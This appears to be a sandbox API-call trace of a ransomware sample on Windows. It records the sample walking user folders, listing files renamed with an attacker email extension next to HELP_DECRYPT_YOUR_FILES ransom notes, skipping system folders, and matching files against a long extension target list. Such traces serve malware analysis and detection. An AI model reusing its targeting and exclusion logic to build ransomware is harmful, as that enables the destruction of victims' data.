	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fbd83d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x89fbd83d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x89fe3a61, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7fc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0fgwkow4jv4zzl-25zz9.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="0FGWKO~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a056266, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a056266, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a056266, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x150b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3sc2nse6i.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="3SC2NS~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a1d3b59, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a1d3b59, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a1f9c5e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x15d20, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wryc98w.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="9WRYC9~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a304df1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a304df1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a32af96, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x9a80, dwReserved0=0x0, dwReserved1=0x0, cFileName="ao66kkoo-.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="AO66KK~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a43626b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a43626b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a43626b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4e80, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-w1g.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="D-W1GC~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a4ce955, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a4ce955, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a51aebc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x14610, dwReserved0=0x0, dwReserved1=0x0, cFileName="deo9rsf3b2dx88.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DEO9RS~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a5d9911, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a5d9911, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a5ffc3c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x10600, dwReserved0=0x0, dwReserved1=0x0, cFileName="dzwk6xa.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DZWK6X~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a64c0db, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a64c0db, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a67249a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xe540, dwReserved0=0x0, dwReserved1=0x0, cFileName="fvlv d.odt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="FVLVDO~1.SCL")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa9e526, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8aa9e526, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ab10bcd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0189.856] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa78213, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8aa78213, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8aa9e526, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7571d6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a7571d6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a77d3b6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xe210, dwReserved0=0x0, dwReserved1=0x0, cFileName="n8imdqrly0-89m.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="N8IMDQ~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7a3637, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a7a3637, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a7c99a8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="op27ti.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="OP27TI~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7efbc1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a7efbc1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a815d05, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qcuqe.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="QCUQEP~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a83bfbd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a83bfbd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a83bfbd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3e60, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpllu6cyj8zpvvctbr 8.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="TPLLU6~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a888383, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a888383, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a888383, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xa210, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcvbxknnmpvb-skuig.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="WCVBXK~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a8d48e7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a8d48e7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a8fad7f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13e60, dwReserved0=0x0, dwReserved1=0x0, cFileName="xvbk0emv3rdkqgynq3.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="XVBK0E~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a946f78, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8a946f78, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8a96d2d9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x13440, dwReserved0=0x0, dwReserved1=0x0, cFileName="z0iork9q93ymj.csv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Z0IORK~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa520d2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8aa520d2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8aa78213, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x10fe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zzm5x5jxuesk93xmmp.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ZZM5X5~1.SCL")) returned 1
	[0189.857] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa520d2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8aa520d2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8aa78213, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x10fe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zzm5x5jxuesk93xmmp.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ZZM5X5~1.SCL")) returned 0
	[0189.857] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0189.857] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0189.858] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58407120, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xc73be0c0, ftLastAccessTime.dwHighDateTime=0x1d96cb9, ftLastWriteTime.dwLowDateTime=0xc73be0c0, ftLastWriteTime.dwHighDateTime=0x1d96cb9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZRxhjZssJTmtcBLglvy", cAlternateFileName="ZRXHJZ~1")) returned 0
	[0189.859] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0189.859] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0189.859] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x890516eb, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x890516eb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x890516eb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x17bc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yf-jfd9lccg7helac.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="YF-JFD~1.SCL")) returned 1
	[0189.859] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x890516eb, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x890516eb, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x890516eb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x17bc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yf-jfd9lccg7helac.xlsx.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="YF-JFD~1.SCL")) returned 0
	[0189.859] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0189.859] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0189.860] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1
	[0189.860] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1
	[0189.860] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1
	[0189.860] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0189.860] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0189.860] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Downloads" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads"
	[0189.861] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Downloads" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads"
	[0189.861] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads\\"
	[0189.861] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Downloads\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads\\"
	[0189.861] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*"
	[0189.861] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0189.861] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*") returned 35
	[0189.861] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.862] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\rdhj0cnfevzx\\downloads\\*.*") returned 0x23
	[0189.862] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.863] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="windows") returned 0x0
	[0189.863] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.863] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="boot") returned 0x0
	[0189.863] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.863] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="system volume information") returned 0x0
	[0189.863] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.863] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0189.863] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.864] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="temp") returned 0x0
	[0189.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.864] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="program files") returned 0x0
	[0189.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.864] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="program files (x86)") returned 0x0
	[0189.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.864] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="appdata") returned 0x0
	[0189.864] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.865] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="application data") returned 0x0
	[0189.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.865] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="winnt") returned 0x0
	[0189.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.865] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="tmp") returned 0x0
	[0189.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.865] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="cache") returned 0x0
	[0189.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.866] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="temporary internet files") returned 0x0
	[0189.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.866] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="webcache") returned 0x0
	[0189.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.866] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="inetcache") returned 0x0
	[0189.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.866] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="nvidia") returned 0x0
	[0189.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.867] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="packages") returned 0x0
	[0189.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.867] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="cookies") returned 0x0
	[0189.867] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.867] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="programdata") returned 0x0
	[0189.867] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0189.867] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0189.867] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0189.867] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0189.868] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Downloads\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads\\"
	[0189.868] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini"
	[0189.868] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini") returned 43
	[0189.868] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.868] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini") returned 0x2b
	[0189.868] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.868] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.868] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini"
	[0189.868] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini") returned 43
	[0189.869] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.869] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.869] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0189.869] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.869] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.